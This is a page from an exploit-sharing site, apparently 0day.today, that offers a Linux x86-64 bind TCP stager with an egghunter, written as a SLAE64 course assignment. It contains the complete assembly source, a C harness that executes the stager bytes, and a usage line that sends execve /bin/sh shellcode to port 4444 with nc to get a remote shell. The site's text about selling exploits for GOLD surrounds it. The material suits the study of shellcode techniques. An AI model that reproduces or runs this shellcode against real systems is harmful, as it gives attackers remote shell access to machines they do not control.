0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
[;Exam Assignment 3
;implementation of egghunter
;Default egg = "deaddead" ;
;If connected the stager check of egg , if present execute the code ;
;You can send a maximum of 255 bytes (egg + code) ;
;if no egg , shellcode exit ;
;Christophe G SLAE64 - 1337 ;
global _start
jmp short _start
_start_code :
call rsi
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor rdx , rdx
push rdx ; null into the stack
push byte 0x29 ; syscall number 41
pop rax
push byte 0x2 ; AF_INET
pop rdi
push byte 0x1 ; SOCK_STREAM
pop rsi
syscall
; copy socket descriptor to rdi for future use
xchg rax , rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov rbx , 0xffffffffa3eefffd ; move ip address , port 4444 , AF_INET (02) in one instruction (noted to remove null of ip address and AF_INET value)
not rbx
push rbx
push rsp ; save rsp value into the stack , needed for rsi later
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push byte 0x31 ; (49)
pop rax
pop rsi ; retrieve value of rsp pushed into the stack before
push byte 0x10 ; (16 bytes) sockaddr_len
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
push byte 0x32 ; (50)
pop rax
push byte 0x2 ;MAX_CLIENTS
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
push byte 0x2b ; Accept syscall
pop rax
sub rsp, 0x10
push rsp
pop rsi ;(struct sockaddr *)&client
push byte 0x10
push rsp
pop rdx ; &sockaddr_len
syscall
; store the client socket description
mov r9, rax
; close parent
push byte 0x3
pop rax
syscall
xchg rdi , r9 ; restore client socket description to rdi
xor rsi , rsi
dup2:
push byte 0x21
pop rax ; duplicate sockets dup2 (new, old) in this case (stdin , stdout , stderr); three times loop
syscall
inc rsi
cmp rsi , 0x3 ; go in the next couple of instruction if equals
loopne dup2
xor rsi , rsi
mul rsi
xor rdi , rdi
sub spl , 0xff
mov rsi , rsp
mov dl , 0xff
syscall
Inc_rsi:
cmp dil , 0xff
jz Exit
inc rsi
inc rdi
cmp [rsi - 4] , dword 0x64616564 ; egghunter
jnz Inc_rsi
cmp [rsi - 8] , dword 0x64616564
jnz Inc_rsi
jz _start_code
Exit:
push byte 0x3c
pop rax
syscall
------------------------------------------------------------------------------------------------------------------------------------------------
Usage :
Execve Shellcode
#(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444
"x68\x85\x11\x47\x02" -->> dumm bytes
"\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead)
"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10"
"\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff" -->> shellcode Execve JCP
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42"
"\x42\x43\x43\x43\x43\x43\x43\x43\x43"
---------------------------------------------------------------------------------------------------------------------------------------------------
Shellcode :
#include <stdio.h>
#include <string.h>
unsigned char stager[] = \
"\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05";
int main()
{
printf("Stager Length: %d\n", (int)strlen(stager));
(*(void (*)()) stager)();
}
# 0day.today [2024-09-29] #